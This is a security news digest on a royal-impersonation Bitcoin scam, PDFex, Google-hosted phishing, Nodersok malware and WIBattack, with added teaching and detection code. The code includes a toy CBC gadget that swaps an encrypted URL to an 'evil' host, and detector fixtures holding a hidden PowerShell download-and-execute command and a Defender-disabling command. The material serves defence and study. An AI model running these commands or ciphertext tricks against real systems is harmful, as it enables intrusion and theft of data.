New Bitcoin scam impersonates the Queen’s private office in Buckingham Palace to trick users

A new Bitcoin scam has been found tricking recipients into making "donations" to help the UK fund its Brexit process. The scam is carried out through phishing emails that appear to come from the Queen's private office in Buckingham Palace. The email asks recipients to make a donation in Bitcoin, framed as a three-month loan with a promised 30% interest. To make it look less suspicious, the email also promises membership of the Royal Warrant Holders Association, which represents businesses and individuals that have supplied goods or services to the royal household for at least five years. The email sets a deadline to create a sense of urgency, and asks recipients to keep its contents secret so that it does not go viral, Forbes reported. Scammers increasingly combine social-engineering techniques with topical, emotionally charged events to extract both sympathy and sensitive details from their targets. In most cases, such scams end with individuals losing large sums of money.

 

New attack dubbed ‘PDFex’ can exfiltrate data from encrypted PDF files

Researchers have detailed a new attack that can exfiltrate data from encrypted Portable Document Format (PDF) files. Dubbed 'PDFex', the attack comes in two variants, Direct Exfiltration and CBC Gadgets. The researchers tested both against 27 widely used PDF viewers, including Adobe Acrobat, Foxit Reader, Evince, Nitro, and the built-in PDF viewers of Chrome and Firefox, and found all of them to be vulnerable. An attacker can manipulate an encrypted PDF file without knowing the corresponding password. Two properties of the format make this possible. First, PDF encryption uses the Cipher Block Chaining (CBC) mode with no integrity check, so anyone can craft self-exfiltrating ciphertext using CBC malleability gadgets: flipping bits in one ciphertext block flips the same bits in the next plaintext block, at the cost of garbling the modified block itself. Second, PDF allows only parts of a document to be encrypted, so an attacker can place their own unencrypted content next to the encrypted parts, which opens exfiltration channels. “More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file,” researchers described in a blog.
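The CBC malleability gadget described above, as an added example that is not part of the original report or the researchers' tooling. A toy 16-byte Feistel cipher stands in for AES because the gadget depends only on CBC chaining, not on the block cipher; the "PDF object" plaintext, the key and the IV are constructed for the example. It shows the two cases an attacker cares about: rewriting a middle block (the preceding block turns to garbage, later blocks survive) and rewriting the first block through the IV, which garbles nothing.

```python
"""CBC malleability gadget of the kind PDFex uses.

A toy 16-byte Feistel cipher stands in for AES: the gadget only relies on
CBC chaining, not on the block cipher. The "PDF object" plaintext, key and
IV are constructed for this example.
"""
import hashlib

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(half: bytes, key: bytes, rnd: int) -> bytes:
    # Feistel round function: keyed hash truncated to half a block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(8):
        left, right = right, xor(left, _f(right, key, rnd))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(8)):
        left, right = xor(right, _f(left, key, rnd)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = toy_encrypt_block(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        c = ct[i:i + BLOCK]
        out.append(xor(toy_decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)


def cbc_gadget(iv: bytes, ct: bytes, idx: int, known: bytes, wanted: bytes):
    """Without the key, make plaintext block `idx` decrypt to `wanted`,
    given that it currently decrypts to `known`.

    In CBC, P[i] = D(C[i]) XOR C[i-1] (C[-1] is the IV). XORing
    (known XOR wanted) into C[i-1] therefore flips exactly those bits in
    P[i]. The price: C[i-1] itself now decrypts to garbage, unless i == 0,
    where only the IV changes and nothing is lost. In PDF the IV sits in
    the clear at the start of each encrypted string or stream.
    """
    delta = xor(known, wanted)
    if idx == 0:
        return xor(iv, delta), ct
    start = (idx - 1) * BLOCK
    prev = xor(ct[start:start + BLOCK], delta)
    return iv, ct[:start] + prev + ct[start + BLOCK:]


def demo() -> dict:
    # Key derived from a password the attacker never learns.
    key = hashlib.sha256(b"owner password unknown to attacker").digest()
    iv = bytes(range(BLOCK))
    # Constructed stand-in for an encrypted PDF URI action (3 blocks).
    pt = b"<</S /URI /URI (" + b"https://safe.exa" + b"mple/doc.pdf)>> "
    ct = cbc_encrypt(key, iv, pt)

    # Case 1: attacker guesses block 1 (a known URL) and swaps the host.
    # Block 0 becomes garbage, block 2 survives untouched.
    iv1, ct1 = cbc_gadget(iv, ct, 1, b"https://safe.exa", b"https://evil.exa")
    # Case 2: rewriting block 0 through the IV garbles nothing.
    iv2, ct2 = cbc_gadget(iv, ct, 0, b"<</S /URI /URI (", b"% injected line ")
    return {
        "original": pt,
        "tampered_mid": cbc_decrypt(key, iv1, ct1),
        "tampered_first": cbc_decrypt(key, iv2, ct2),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:15s} {value!r}")
```

The garbage block in case 1 is the reason the real attack needs the "mixing of ciphertexts with plaintexts" mentioned in the quote: the attacker arranges the surrounding unencrypted PDF syntax so that the garbled block lands somewhere the parser ignores, while the rewritten block carries the URL or form action that leaks the decrypted content.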

 

Threat actors abuse Google domains appspot.com and web.app in latest phishing attacks

After Microsoft Azure domains, threat actors are now targeting Google cloud domains to host their latest phishing pages. The abused domains are appspot.com and web.app. Appspot.com is the domain of Google App Engine, a cloud platform for developing and hosting web applications in Google-managed data centers, while web.app is the default domain for sites hosted on Firebase, Google's mobile and web application platform. According to researchers from Zscaler ThreatLabZ, the campaigns benefit from the valid SSL/TLS certificates that Google serves for appspot.com and web.app subdomains, so the pages show the padlock a victim expects. The attackers have built look-alike login pages for services widely used in business, including Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. These pages capture login credentials, which are then sent to a remote server controlled by the attackers. To evade detection by scanning engines, most of the page logic is kept in an external JavaScript file whose name is 32 characters long and different for every site.
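One way to hunt for this pattern in web-proxy logs, as an added example that is not part of the Zscaler report: flag requests to appspot.com or web.app subdomains that also carry a brand name in the subdomain or load a 32-character randomly named script. The log lines are constructed, the brand list mirrors the services named above and should be extended for real use, and the assumption that the random filename is alphanumeric is mine (the report only gives its length).

```python
"""Triage of proxy-log URLs for phishing pages parked on Google-hosted
domains. Added example, not from the Zscaler report: the log lines are
constructed, the brand list mirrors the services named in the report and
should be extended, and the alphanumeric assumption for the 32-character
script name is ours.
"""
import re
from urllib.parse import urlparse

HOSTING_SUFFIXES = (".appspot.com", ".web.app")
# Services the report says were imitated; extend as needed.
BRANDS = ("dropbox", "outlook", "sharepoint", "docusign")
# External script with a 32-character random name at the site root
# (assumed alphanumeric; the report only gives the length).
RANDOM_JS = re.compile(r"^/[A-Za-z0-9]{32}\.js$")

# Constructed proxy log: timestamp, client, method, URL, status.
LOG = """\
2019-09-27T10:01:02Z 10.0.0.5 GET https://docusign-secure-view.web.app/ 200
2019-09-27T10:01:03Z 10.0.0.5 GET https://docusign-secure-view.web.app/xK9fq2LpR7mN3vB8cD1eF4gH6jK0lM2n.js 200
2019-09-27T10:02:10Z 10.0.0.9 GET https://my-notes-app.appspot.com/static/app.js 200
2019-09-27T10:03:44Z 10.0.0.7 GET https://sharepoint-docs.appspot.com/login.html 200
2019-09-27T10:04:00Z 10.0.0.7 GET https://www.dropbox.com/login 200
"""


def hosting_suffix(host: str):
    return next((s for s in HOSTING_SUFFIXES if host.endswith(s)), None)


def assess(url: str) -> list:
    """Return the reasons a URL looks like a hosted phishing page
    (empty list = nothing suspicious). A hit needs the Google-hosted
    suffix plus at least one further indicator; a plain hosted app on
    its own is not reported, to keep the noise down."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    suffix = hosting_suffix(host)
    if suffix is None:
        return []
    reasons = []
    subdomain = host[: -len(suffix)]
    if any(b in subdomain for b in BRANDS):
        reasons.append("brand-name-in-subdomain")
    if RANDOM_JS.match(p.path):
        reasons.append("32-char-random-script")
    return ["google-hosted"] + reasons if reasons else []


def triage(log: str) -> list:
    """Return [(url, reasons)] for every flagged request in the log."""
    hits = []
    for line in log.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        url = fields[3]
        reasons = assess(url)
        if reasons:
            hits.append((url, reasons))
    return hits


if __name__ == "__main__":
    for url, why in triage(LOG):
        print(url, "->", ", ".join(why))
```

Because legitimate applications live on the same suffixes, the heuristic deliberately requires a second indicator before it reports anything; the 32-character script rule is the more specific of the two and is worth watching on its own once a campaign is confirmed.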

 

New malware dubbed Nodersok discovered by researchers

A new malware campaign dubbed Nodersok, which abuses legitimate tools, has been observed over the last few weeks, mainly against consumers in Europe and the United States. The attack relies on an elusive network infrastructure and makes use of advanced fileless techniques. Nodersok chains legitimate tools, either already present on the machine or downloaded as third-party binaries: 'Node.exe', the Windows build of the Node.js runtime, and 'WinDivert', a network packet capture and manipulation utility. The malware also contains a PowerShell module that attempts to disable Windows Update and Windows Defender. “Like the Astaroth campaign, every step of the infection chain only runs legitimate LOLBins, either from the machine itself or downloaded third-party ones. All of the relevant functionalities reside in scripts and shellcodes that are almost always coming in encrypted, are then decrypted, and run while only in memory,” say the researchers from Microsoft. The primary victims of this campaign are consumers, but around 3% of the attacks were aimed at organizations. Infection is a multi-stage process that downloads multiple components to the infected system. It begins when the user downloads and runs an HTML Application (HTA) file. The HTA reaches out to a randomly named domain to download JavaScript code; these domains have been observed to be short-lived. Several instances of PowerShell are then launched to install the various modules on the system. Researchers at Cisco have analyzed the same malware and call it 'Divergent'. While the Microsoft report says the infected machines are turned into proxies for malicious activity, the Cisco report says the attackers use the proxies for click fraud.
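Because every stage of the chain is a legitimate binary, the useful detection signal is the process tree rather than any single file. The following is an added example, not from the Microsoft or Cisco reports: it walks constructed Sysmon-style process-creation and driver-load events and flags a node.exe whose ancestry passes through powershell.exe and mshta.exe, a PowerShell command line that disables Defender or Windows Update, and a WinDivert driver load. File names, command lines and PIDs in the events are placeholders.

```python
"""Process-tree detection for a Nodersok-style LOLBin chain.

Added example, not from the Microsoft or Cisco reports. The events below
are constructed in a Sysmon-like shape (process creation and driver load);
file names, PIDs and command lines are placeholders.
"""
import ntpath
import re

# Constructed process-creation events: pid, parent pid, image, command line.
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\u\Downloads\update.hta"},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('https://example.invalid/stage2')\""},
    {"pid": 310, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\u\AppData\Local\Temp\node.exe",
     "cmd": "node.exe -e <inline script placeholder>"},
    {"pid": 500, "ppid": 100, "image": r"C:\Program Files\nodejs\node.exe",
     "cmd": "node.exe server.js"},  # a developer's legitimate Node.js, must not fire
]
# Constructed driver-load events (Sysmon event 6 shape): image only.
DRIVER_EVENTS = [
    {"image": r"C:\Users\u\AppData\Local\Temp\WinDivert64.sys"},
    {"image": r"C:\Windows\System32\drivers\tcpip.sys"},
]

DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+", re.I)
UPDATE_TAMPER = re.compile(r"\bwuauserv\b", re.I)  # assumed: stopping the Update service


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestry(events, pid):
    """Image basenames from the process up to the root, lower-cased."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        e = by_pid[pid]
        chain.append(image_name(e["image"]))
        pid = e["ppid"]
    return chain


def lolbin_chains(events):
    """PIDs of node.exe whose ancestors include powershell.exe and mshta.exe."""
    hits = []
    for e in events:
        chain = ancestry(events, e["pid"])
        if chain[0] == "node.exe" and "powershell.exe" in chain and "mshta.exe" in chain:
            hits.append(e["pid"])
    return hits


def defender_or_update_tampering(events):
    return [e["pid"] for e in events
            if DEFENDER_TAMPER.search(e["cmd"]) or UPDATE_TAMPER.search(e["cmd"])]


def windivert_loads(driver_events):
    return [d["image"] for d in driver_events
            if image_name(d["image"]).startswith("windivert")]


def report(events=PROCESS_EVENTS, drivers=DRIVER_EVENTS) -> dict:
    return {
        "hta_to_node_chains": lolbin_chains(events),
        "tampering_pids": defender_or_update_tampering(events),
        "windivert_drivers": windivert_loads(drivers),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

The ancestry walk is what separates the campaign from a developer running Node.js: the legitimate node.exe under explorer.exe (PID 500) is ignored, while the copy launched from a PowerShell that was itself spawned by mshta.exe is reported.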

 

Researchers disclose new SIM card attack dubbed ‘WIBattack’

Researchers from Ginno Security Lab have detailed a new SIM card attack similar to the Simjacker attack. Dubbed WIBattack, it allows attackers to track users' devices by exploiting the Wireless Internet Browser (WIB) application that runs on many SIM cards. To reach the WIB app, attackers send a specially formatted binary SMS (an OTA SMS) carrying WIB commands to the victim's phone number; the handset passes such messages to the SIM, where they are executed as SIM Toolkit (STK) instructions. The WIB app responds by issuing proactive commands to the victim's handset, such as initiating a call, sending an SMS, or reporting device information. With these, an attacker can learn the victim's location, send SMS to any number, or place calls to any number and eavesdrop on conversations. Ginno Security Lab estimates that hundreds of millions of devices carry SIM cards with a WIB app. To check whether a SIM is exposed, the researchers recommend testing it with the SIMtester tool, and they are developing a SIM scanning tool that runs on Android devices.
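What the "specially formatted binary SMS" looks like on the wire, as an added example that is not part of Ginno Security Lab's research: an OTA SMS is a class-2, 8-bit message with a SIM-toolkit security header in its user data header, followed by a secured command packet in the 3GPP TS 23.048 / ETSI TS 102 225 format whose SPI bytes declare how much protection (integrity check, ciphering, replay counter) the packet carries and whose TAR names the target SIM application. The decoder below parses that packet and flags one that requests no protection at all, which is the condition under which anyone who can send an SMS can drive the application. The two packets are constructed, the TAR is a placeholder rather than the real WIB identifier, and the payload bytes are dummies, not WIB bytecode.

```python
"""Decoder for the secured command packet an OTA SMS carries to a SIM
application (3GPP TS 23.048 / ETSI TS 102 225 format), with a check for
packets that ask for no cryptographic protection. Added example, not
from Ginno Security Lab; the two packets are constructed, the TAR is a
placeholder rather than the real WIB application identifier, and the
payload bytes are dummies, not WIB bytecode.
"""
import struct

OTA_TP_PID = 0x7F          # TP-Protocol-Identifier: (U)SIM data download
OTA_TP_DCS = 0xF6          # TP-Data-Coding-Scheme: class 2 (SIM-specific), 8-bit
IEI_COMMAND_PACKET = 0x70  # UDH element: (U)SIM Toolkit Security Header, command

RC_CC_DS_NAMES = {0: "none", 1: "RC", 2: "CC", 3: "DS"}
COUNTER_NAMES = {0: "no counter", 1: "counter not checked",
                 2: "counter must increase", 3: "counter must be +1"}


def parse_udh(user_data: bytes):
    """Split TP-User-Data into its UDH elements and the remaining body."""
    udhl = user_data[0]
    i, elements = 1, []
    while i < 1 + udhl:
        iei, iedl = user_data[i], user_data[i + 1]
        elements.append((iei, user_data[i + 2:i + 2 + iedl]))
        i += 2 + iedl
    return elements, user_data[1 + udhl:]


def parse_command_packet(body: bytes) -> dict:
    """Fields: CPL(2) CHL(1) SPI(2) KIc(1) KID(1) TAR(3) CNTR(5) PCNTR(1)
    RC/CC/DS(variable), then the secured data."""
    (cpl,) = struct.unpack(">H", body[:2])
    chl = body[2]
    hdr = body[3:3 + chl]
    spi1, spi2 = hdr[0], hdr[1]
    return {
        "spi": (spi1, spi2),
        "kic": hdr[2], "kid": hdr[3],
        "tar": hdr[4:7].hex(),
        "counter": hdr[7:12].hex(),
        "padding_count": hdr[12],
        "rc_cc_ds": hdr[13:].hex(),
        "data": body[3 + chl:2 + cpl],
        # SPI first byte: b1b2 RC/CC/DS, b3 ciphering, b4b5 counter mode.
        "integrity": RC_CC_DS_NAMES[spi1 & 0x03],
        "ciphered": bool(spi1 & 0x04),
        "counter_mode": COUNTER_NAMES[(spi1 >> 3) & 0x03],
    }


def analyse_ota_sms(tp_pid: int, tp_dcs: int, user_data: bytes) -> dict:
    """Classify an SMS: is it an OTA command packet, which SIM application
    (TAR) does it address, and does it request any protection at all?"""
    elements, body = parse_udh(user_data)
    is_ota = (tp_pid == OTA_TP_PID and tp_dcs == OTA_TP_DCS
              and any(iei == IEI_COMMAND_PACKET for iei, _ in elements))
    if not is_ota:
        return {"is_ota": False}
    pkt = parse_command_packet(body)
    pkt["is_ota"] = True
    # No RC/CC/DS and no ciphering: whether the SIM honours this depends only
    # on its configured minimum security level for the TAR. If it does, any
    # sender of an SMS can drive that application.
    pkt["unprotected"] = pkt["integrity"] == "none" and not pkt["ciphered"]
    return pkt


def build_packet(spi1: int, rc_cc_ds: bytes, tar: bytes, data: bytes) -> bytes:
    """Assemble user data (UDH + command packet) for the constructed samples."""
    header = bytes([spi1, 0x00, 0x00, 0x00]) + tar + bytes(5) + b"\x00" + rc_cc_ds
    packet = (struct.pack(">H", 1 + len(header) + len(data))
              + bytes([len(header)]) + header + data)
    return bytes([0x02, IEI_COMMAND_PACKET, 0x00]) + packet


TAR_PLACEHOLDER = b"\x00\x00\x01"        # placeholder, not a real TAR
DUMMY_DATA = bytes.fromhex("0102030405")  # dummy payload, not WIB bytecode
# Constructed: SPI 0x00 = no RC/CC/DS, no ciphering, no counter check.
UNPROTECTED_SMS = build_packet(0x00, b"", TAR_PLACEHOLDER, DUMMY_DATA)
# Constructed: SPI 0x16 = counter must increase, ciphered, 8-byte CC present.
PROTECTED_SMS = build_packet(0x16, bytes(8), TAR_PLACEHOLDER, DUMMY_DATA)


if __name__ == "__main__":
    for name, sms in (("unprotected", UNPROTECTED_SMS), ("protected", PROTECTED_SMS)):
        print(name, analyse_ota_sms(OTA_TP_PID, OTA_TP_DCS, sms))
```

The same three fields (PID, DCS, the 0x70 header) are what an operator-side SMS firewall keys on to stop OTA messages from arbitrary senders, and the SPI is what a SIM profile audit checks when asking whether an application such as WIB can be reached without a cryptographic checksum.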

 

Edited and compiled by cyber security specialist James Aguilan.